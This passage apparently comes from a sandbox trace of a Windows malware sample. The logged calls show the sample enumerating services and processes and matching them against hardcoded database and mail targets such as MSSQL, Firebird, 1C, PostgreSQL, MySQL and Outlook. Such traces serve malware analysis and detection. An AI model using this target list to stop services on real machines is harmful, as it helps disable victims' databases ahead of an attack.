(lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0253.597] lstrlenW (lpString="RpcSs") returned 5 [0253.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0253.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0253.597] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0253.597] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0253.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0253.597] lstrlenW (lpString="SamSs") returned 5 [0253.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0253.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0253.597] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0253.597] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0253.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0253.597] lstrlenW (lpString="Schedule") returned 8 [0253.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0253.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0253.597] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0253.597] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0253.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0253.597] lstrlenW (lpString="SENS") returned 4 [0253.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0253.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0253.597] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0253.598] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0253.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0253.598] lstrlenW (lpString="ShellHWDetection") returned 16 [0253.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0253.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0253.598] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0253.598] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0253.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0253.598] lstrlenW (lpString="Spooler") returned 7 [0253.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0253.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0253.598] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0253.598] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0253.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0253.598] lstrlenW (lpString="SysMain") returned 7 [0253.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0253.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0253.598] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0253.598] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0253.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0253.598] lstrlenW (lpString="Themes") returned 6 [0253.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0253.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0253.598] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0253.598] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0253.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0253.598] lstrlenW (lpString="UxSms") returned 5 [0253.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0253.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0253.598] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0253.598] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0253.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0253.599] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0253.599] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x39c [0253.600] Process32FirstW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.600] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0253.600] lstrlenW (lpString="System") returned 6 [0253.600] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0253.600] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0253.600] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0253.600] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0253.600] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0253.600] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0253.600] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0253.600] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0253.600] lstrlenW (lpString="smss.exe") returned 8 [0253.601] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0253.601] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0253.601] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0253.601] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0253.601] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0253.601] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0253.601] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0253.601] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.601] lstrlenW (lpString="csrss.exe") returned 9 [0253.601] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0253.601] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0253.601] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0253.601] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0253.601] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0253.601] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0253.601] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0253.601] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0253.601] lstrlenW (lpString="wininit.exe") returned 11 [0253.601] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0253.601] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0253.602] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0253.602] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0253.602] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0253.602] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0253.602] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0253.602] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.602] lstrlenW (lpString="csrss.exe") returned 9 [0253.602] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0253.602] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0253.602] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0253.602] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0253.602] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0253.602] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0253.602] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0253.602] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0253.602] lstrlenW (lpString="winlogon.exe") returned 12 [0253.602] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0253.602] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0253.602] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0253.603] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0253.603] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0253.603] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0253.603] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0253.603] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0253.603] lstrlenW (lpString="services.exe") returned 12 [0253.603] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0253.603] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0253.603] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0253.603] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0253.603] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0253.603] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0253.603] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0253.603] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0253.603] lstrlenW (lpString="lsass.exe") returned 9 [0253.603] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0253.603] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0253.603] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0253.603] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0253.604] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0253.604] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0253.604] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0253.604] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0253.604] lstrlenW (lpString="lsm.exe") returned 7 [0253.604] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0253.604] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0253.604] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0253.604] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0253.604] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0253.604] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0253.604] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0253.604] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.604] lstrlenW (lpString="svchost.exe") returned 11 [0253.604] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0253.604] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0253.604] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0253.604] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0253.604] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0253.604] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0253.605] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.605] lstrlenW (lpString="svchost.exe") returned 11 [0253.605] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0253.605] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.605] lstrlenW (lpString="svchost.exe") returned 11 [0253.605] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0253.605] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0253.605] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.606] lstrlenW (lpString="svchost.exe") returned 11 [0253.606] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0253.606] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0253.606] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0253.606] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0253.606] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0253.606] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.606] lstrlenW (lpString="svchost.exe") returned 11 [0253.606] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0253.607] lstrlenW (lpString="audiodg.exe") returned 11 [0253.607] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.607] lstrlenW (lpString="svchost.exe") returned 11 [0253.607] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.607] lstrlenW (lpString="svchost.exe") returned 11 [0253.607] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0253.607] lstrlenW (lpString="userinit.exe") returned 12 [0253.607] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0253.608] lstrlenW (lpString="dwm.exe") returned 7 [0253.608] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.608] lstrlenW (lpString="explorer.exe") returned 12 [0253.608] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0253.608] lstrlenW (lpString="spoolsv.exe") returned 11 [0253.608] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0253.608] lstrlenW (lpString="taskhost.exe") returned 12 [0253.609] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.609] lstrlenW (lpString="svchost.exe") returned 11 [0253.609] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0253.609] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0253.609] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0253.609] lstrlenW (lpString="reader_sl.exe") returned 13 [0253.610] Process32NextW (in: hSnapshot=0x39c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0253.610] CloseHandle (hObject=0x39c) returned 1 [0253.610] Sleep (dwMilliseconds=0x1f4) [0254.135] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea330 [0254.440] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0254.440] GetLastError () returned 0xea [0254.440] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dec5a0 [0254.440] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0254.440] CloseServiceHandle (hSCObject=0x47ea330) returned 1 [0254.441] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0254.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0254.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0254.441] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0254.441] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0254.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0254.441] lstrlenW (lpString="AudioSrv") returned 8 [0254.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0254.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0254.441] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0254.441] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0254.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0254.441] lstrlenW (lpString="BFE") returned 3 [0254.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0254.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0254.441] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0254.441] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0254.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0254.441] lstrlenW (lpString="CryptSvc") returned 8 [0254.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0254.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0254.441] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0254.441] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0254.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0254.441] lstrlenW (lpString="CscService") returned 10 [0254.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0254.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0254.442] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0254.442] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0254.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0254.442] lstrlenW (lpString="DcomLaunch") returned 10 [0254.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0254.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0254.442] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0254.442] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0254.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0254.442] lstrlenW (lpString="Dhcp") returned 4 [0254.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0254.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0254.442] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0254.442] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0254.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0254.442] lstrlenW (lpString="Dnscache") returned 8 [0254.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0254.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0254.442] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0254.442] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0254.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0254.442] lstrlenW (lpString="DPS") returned 3 [0254.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0254.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 